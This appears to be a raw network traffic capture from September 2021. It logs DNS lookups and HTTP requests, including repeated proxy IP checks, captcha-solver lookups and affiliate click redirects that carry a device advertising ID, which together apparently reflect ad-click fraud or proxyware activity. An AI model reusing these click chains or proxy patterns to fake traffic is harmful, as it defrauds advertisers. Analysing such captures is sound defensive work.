DNSdist.acweb.onlineRequestdist.acweb.onlineIN AResponsedist.acweb.onlineIN CNAMEpolar-chickpea-1jdrztij9nw3e5ua8njfde5b.herokudns.compolar-chickpea-1jdrztij9nw3e5ua8njfde5b.herokudns.comIN A52.20.78.240polar-chickpea-1jdrztij9nw3e5ua8njfde5b.herokudns.comIN A3.232.242.170polar-chickpea-1jdrztij9nw3e5ua8njfde5b.herokudns.comIN A3.220.57.224polar-chickpea-1jdrztij9nw3e5ua8njfde5b.herokudns.comIN A54.91.59.199
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNScheckip.kidsautoios.comRequestcheckip.kidsautoios.comIN AResponsecheckip.kidsautoios.comIN A103.47.192.108
-
GEThttp://checkip.kidsautoios.com/ip/index.php/api/ipRequestGET /ip/index.php/api/ip HTTP/1.1
Host: checkip.kidsautoios.com
Connection: keep-alive
Accept: */*
User-Agent: kidsdaemon/10.5.20 CFNetwork/978.0.7 Darwin/18.7.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:33:27 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.5.38
Set-Cookie: ci_session=BzFbYQ1lDD9SKwAjAD4HNQ1uBDVSIwQsBzAEdlYkX2IAPFFpVVlSaVNgU3EJb10nUWkCYQs9VWwEdQtkBmxUN1ZlUGFXM1JkVTAHMlNhBWcHaFs%2FDTUMY1I1AGQAZQdiDWsEbVI1BGcHYAQ2VmFfaQBlUTVVY1IyU2dTcQlvXSdRaQJjCz9VbAR1C2kGJVRQVmVQNVcyUnRVYwciU3MFdQdrWygNagw0UmIAagAmBzUNawQ7Ui8EaQdkBCtWYF86AH1RMlU3UiJTP1MgCW5dZVFjAmgLLVUjBCQLZQYnVFBWZVA2VzNSaFVyB3NTOwUkB2pbbg1gDD9ScgA7AG0HYA0tBGtSYAQ6BzgEalY5XyQAYlE3VShSNVMqU2EJZF10URACFAtBVTMEIwt3BjpUfVZvUH5Xb1IxVT4Hf1MwBXkHZ1t7DRQMZFIiACcAbQdqDXEEPlI5BHEHYgQrVmdfKQBoUXRVPFIxUzdTaQl2XThRMgIhC3tVCQQ2C2MGIVRmVnJQOFciUn9VJAdqU2kFbQdhW20NYww1UmkAYgA0BzwNbgQ4UjoELAdvBDxWbV8pACZRdFVjUnJTW1M3CTVdIFEyAnALNFUlBG0LMAZvVC1WJlBqVys%3D; expires=Mon, 06-Sep-2021 11:33:27 GMT; Max-Age=7200; path=/
Content-Length: 12
Connection: close
Content-Type: application/json
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:46:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:46:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:46:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A172.67.75.150monitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A104.26.2.167
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNStpc.googlesyndication.comRequesttpc.googlesyndication.comIN AResponsetpc.googlesyndication.comIN A142.251.36.1
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:46:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A172.67.164.57feed.lookbox.netIN A104.21.15.206
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:46:38 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSapps.mzstatic.comRequestapps.mzstatic.comIN AResponseapps.mzstatic.comIN CNAMEapps-mzstatic-cdn.itunes-apple.com.akadns.netapps-mzstatic-cdn.itunes-apple.com.akadns.netIN CNAMEapps.mzstatic.com.edgekey.netapps.mzstatic.com.edgekey.netIN CNAMEe673.dsce9.akamaiedge.nete673.dsce9.akamaiedge.netIN A2.16.118.172
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:46:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSrd.clk.thribee.comRequestrd.clk.thribee.comIN AResponserd.clk.thribee.comIN CNAMEbcn.trovit.combcn.trovit.comIN A213.229.152.166
-
DNSrd.clk.thribee.comRequestrd.clk.thribee.comIN AResponserd.clk.thribee.comIN CNAMEbcn.trovit.combcn.trovit.comIN A213.229.152.166
-
DNSamp-api.apps.apple.comRequestamp-api.apps.apple.comIN AResponseamp-api.apps.apple.comIN CNAMEamp-api.apps-lb.itunes-apple.com.akadns.netamp-api.apps-lb.itunes-apple.com.akadns.netIN CNAMEamp-api.apps.apple.com.edgekey.netamp-api.apps.apple.com.edgekey.netIN CNAMEe3925.dscx.akamaiedge.nete3925.dscx.akamaiedge.netIN A104.80.224.117
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSsafebrowsing.googleapis.comRequestsafebrowsing.googleapis.comIN AResponsesafebrowsing.googleapis.comIN A142.250.179.202
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSs.srvsynd.comRequests.srvsynd.comIN AResponses.srvsynd.comIN A34.248.176.243s.srvsynd.comIN A52.31.191.243s.srvsynd.comIN A52.19.145.179s.srvsynd.comIN A52.50.88.110s.srvsynd.comIN A18.203.144.158s.srvsynd.comIN A18.203.197.143s.srvsynd.comIN A52.212.133.238s.srvsynd.comIN A18.203.213.28s.srvsynd.comIN A52.17.239.19s.srvsynd.comIN A18.202.153.141
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:46:52 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSsafebrowsing.googleapis.comRequestsafebrowsing.googleapis.comIN AResponsesafebrowsing.googleapis.comIN A142.250.179.202
-
GEThttp://mobileoffcpi.com/gooffer.php?aff_id=123&id_offer=3661&gaid=a7ffb9c6-d010-4418-b0c1-9b8d417db4b0&may=25RequestGET /gooffer.php?aff_id=123&id_offer=3661&gaid=a7ffb9c6-d010-4418-b0c1-9b8d417db4b0&may=25 HTTP/1.1
Host: mobileoffcpi.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 10; SM-A107M Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.90 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Requested-With: com.android.chrome
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 06 Sep 2021 09:46:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://track.adxmel.com/aff_c?aid=1136301&oid=200580&aff_sub=vWDBylkaICNEjUp1Rm9sTYg2AKP8Hb&advid=a7ffb9c6-d010-4418-b0c1-9b8d417db4b0&source=452
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
-
DNScheckip.kidsautoios.comRequestcheckip.kidsautoios.comIN AResponsecheckip.kidsautoios.comIN A103.47.192.108
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A172.67.164.57feed.lookbox.netIN A104.21.15.206
-
GEThttp://checkip.kidsautoios.com/ip/index.php/api/ipRequestGET /ip/index.php/api/ip HTTP/1.1
Host: checkip.kidsautoios.com
Accept: */*
Connection: keep-alive
Cookie: ci_session=BzFbYQ1lDD9SKwAjAD4HNQ1uBDVSIwQsBzAEdlYkX2IAPFFpVVlSaVNgU3EJb10nUWkCYQs9VWwEdQtkBmxUN1ZlUGFXM1JkVTAHMlNhBWcHaFs%2FDTUMY1I1AGQAZQdiDWsEbVI1BGcHYAQ2VmFfaQBlUTVVY1IyU2dTcQlvXSdRaQJjCz9VbAR1C2kGJVRQVmVQNVcyUnRVYwciU3MFdQdrWygNagw0UmIAagAmBzUNawQ7Ui8EaQdkBCtWYF86AH1RMlU3UiJTP1MgCW5dZVFjAmgLLVUjBCQLZQYnVFBWZVA2VzNSaFVyB3NTOwUkB2pbbg1gDD9ScgA7AG0HYA0tBGtSYAQ6BzgEalY5XyQAYlE3VShSNVMqU2EJZF10URACFAtBVTMEIwt3BjpUfVZvUH5Xb1IxVT4Hf1MwBXkHZ1t7DRQMZFIiACcAbQdqDXEEPlI5BHEHYgQrVmdfKQBoUXRVPFIxUzdTaQl2XThRMgIhC3tVCQQ2C2MGIVRmVnJQOFciUn9VJAdqU2kFbQdhW20NYww1UmkAYgA0BzwNbgQ4UjoELAdvBDxWbV8pACZRdFVjUnJTW1M3CTVdIFEyAnALNFUlBG0LMAZvVC1WJlBqVys%3D
User-Agent: kidsdaemon/10.5.20 CFNetwork/978.0.7 Darwin/18.7.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:34:02 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.5.38
Content-Length: 12
Connection: close
Content-Type: application/json
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A104.21.15.206feed.lookbox.netIN A172.67.164.57
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A172.67.164.57feed.lookbox.netIN A104.21.15.206
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEz-ljzi-i5-walmartimages-com.speedroute.netz-ljzi-i5-walmartimages-com.speedroute.netIN CNAMEz-walmart-dn2.speedroute.netz-walmart-dn2.speedroute.netIN A148.163.253.36
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSads.stickyadstv.comRequestads.stickyadstv.comIN AResponseads.stickyadstv.comIN CNAMEip1.ads.stickyadstv.com.akadns.netip1.ads.stickyadstv.com.akadns.netIN CNAMEip2.ads.stickyadstv.com.akadns.netip2.ads.stickyadstv.com.akadns.netIN CNAMEcidr1.ads.stickyadstv.com.akadns.netcidr1.ads.stickyadstv.com.akadns.netIN CNAMEstickyadstv.com.edgekey.netstickyadstv.com.edgekey.netIN CNAMEe11676.b.akamaiedge.nete11676.b.akamaiedge.netIN A104.123.41.104
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
GEThttp://play.googleapis.com/generate_204RequestGET /generate_204 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36
Host: play.googleapis.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 06 Sep 2021 09:47:06 GMT
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSgoogle.comRequestgoogle.comIN AResponsegoogle.comIN A142.251.36.46
-
DNSbeacons.gcp.gvt2.comRequestbeacons.gcp.gvt2.comIN AResponsebeacons.gcp.gvt2.comIN CNAMEbeacons-handoff.gcp.gvt2.combeacons-handoff.gcp.gvt2.comIN A142.250.179.131
-
DNStop.searchinfonow.comRequesttop.searchinfonow.comIN AResponsetop.searchinfonow.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNStag.bounceexchange.comRequesttag.bounceexchange.comIN AResponsetag.bounceexchange.comIN CNAMEtag.bouncex.nettag.bouncex.netIN A34.120.253.250
-
DNStop.searchinfonow.comRequesttop.searchinfonow.comIN AResponsetop.searchinfonow.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNStop.theresultsengine.comRequesttop.theresultsengine.comIN AResponsetop.theresultsengine.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
GEThttp://tracking.leomob.com/track?awno=lm133&oid=3236727&devid=a7ffb9c6-d010-4418-b0c1-9b8d417db4b0&aff_sub=dal969L3t8vv0_QqtrUUAmj1HM9QdjNk&subUuid=1136301_452RequestGET /track?awno=lm133&oid=3236727&devid=a7ffb9c6-d010-4418-b0c1-9b8d417db4b0&aff_sub=dal969L3t8vv0_QqtrUUAmj1HM9QdjNk&subUuid=1136301_452 HTTP/1.1
Host: tracking.leomob.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 10; SM-A107M Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.90 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Requested-With: com.android.chrome
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:47:10 GMT
Content-Length: 0
Connection: keep-alive
Server: Tengine/2.2.2
Location: https://ccapi.g2afse.com/click?pid=167&offer_id=1349085&sub1=postback1325399cc%257B%2522devid%2522%253A%2522a7ffb9c6-d010-4418-b0c1-9b8d417db4b0%2522%252C%2522aff_sub%2522%253A%2522dal969L3t8vv0_QqtrUUAmj1HM9QdjNk%2522%252C%2522awno%2522%253A%2522lm133%2522%252C%2522subUuid%2522%253A%25221136301_452%2522%252C%2522oid%2522%253A%25223236727%2522%252C%2522awt%2522%253A%2522noinxnnkjnqwnx%2522%252C%2522rip%2522%253A%2522154.61.71.51%2522%257D&sub2=lm1331136301_452&sub5=
Content-Language: en-US
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNStop.searchinfonow.comRequesttop.searchinfonow.comIN AResponsetop.searchinfonow.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNStop.searchinfonow.comRequesttop.searchinfonow.comIN AResponsetop.searchinfonow.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNStechadsmedia.comRequesttechadsmedia.comIN AResponsetechadsmedia.comIN A51.91.200.241
-
DNStechadsmedia.comRequesttechadsmedia.comIN AResponsetechadsmedia.comIN A51.91.200.241
-
DNScontent-autofill.googleapis.comRequestcontent-autofill.googleapis.comIN AResponsecontent-autofill.googleapis.comIN A216.58.208.106
-
DNScontent-autofill.googleapis.comRequestcontent-autofill.googleapis.comIN AResponsecontent-autofill.googleapis.comIN A216.58.208.106
-
DNSwww.bing.comRequestwww.bing.comIN AResponsewww.bing.comIN CNAMEa-0001.a-afdentry.net.trafficmanager.neta-0001.a-afdentry.net.trafficmanager.netIN CNAMEwww-bing-com.dual-a-0001.a-msedge.netwww-bing-com.dual-a-0001.a-msedge.netIN CNAMEdual-a-0001.dc-msedge.netdual-a-0001.dc-msedge.netIN A131.253.33.200dual-a-0001.dc-msedge.netIN A13.107.22.200
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:29 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:29 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:30 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSupdate.googleapis.comRequestupdate.googleapis.comIN AResponseupdate.googleapis.comIN A142.250.179.195
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A172.67.164.57feed.lookbox.netIN A104.21.15.206
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:36 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A104.21.15.206feed.lookbox.netIN A172.67.164.57
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A104.21.15.206feed.lookbox.netIN A172.67.164.57
-
DNSclickserve.dartsearch.netRequestclickserve.dartsearch.netIN AResponseclickserve.dartsearch.netIN A142.250.179.142
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:41 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:41 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNStop.theresultsengine.comRequesttop.theresultsengine.comIN AResponsetop.theresultsengine.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNStop.allresultsweb.comRequesttop.allresultsweb.comIN AResponsetop.allresultsweb.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNStop.faqtoids.comRequesttop.faqtoids.comIN AResponsetop.faqtoids.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNStop.searchinfonow.comRequesttop.searchinfonow.comIN AResponsetop.searchinfonow.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNStop.theresultsengine.comRequesttop.theresultsengine.comIN AResponsetop.theresultsengine.comIN CNAMEiac.techadsmedia.comiac.techadsmedia.comIN A51.91.200.241
-
DNSgizmodo.comRequestgizmodo.comIN AResponsegizmodo.comIN A151.101.66.166gizmodo.comIN A151.101.194.166gizmodo.comIN A151.101.130.166gizmodo.comIN A151.101.2.166
-
GEThttp://gizmodo.com/RequestGET / HTTP/1.1
Host: gizmodo.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 301 Moved Permanently
Server: Varnish
Retry-After: 0
Location: https://gizmodo.com/
Content-Length: 0
Accept-Ranges: bytes
Date: Mon, 06 Sep 2021 09:47:42 GMT
Via: 1.1 varnish
Connection: close
X-Served-By: cache-ams21079-AMS
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1630921662.135654,VS0,VE0
Set-Cookie: geocc=NL;path=/;
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:50 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:48 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A172.67.75.150monitor.capmonster.appIN A104.26.3.167
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:47:48 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
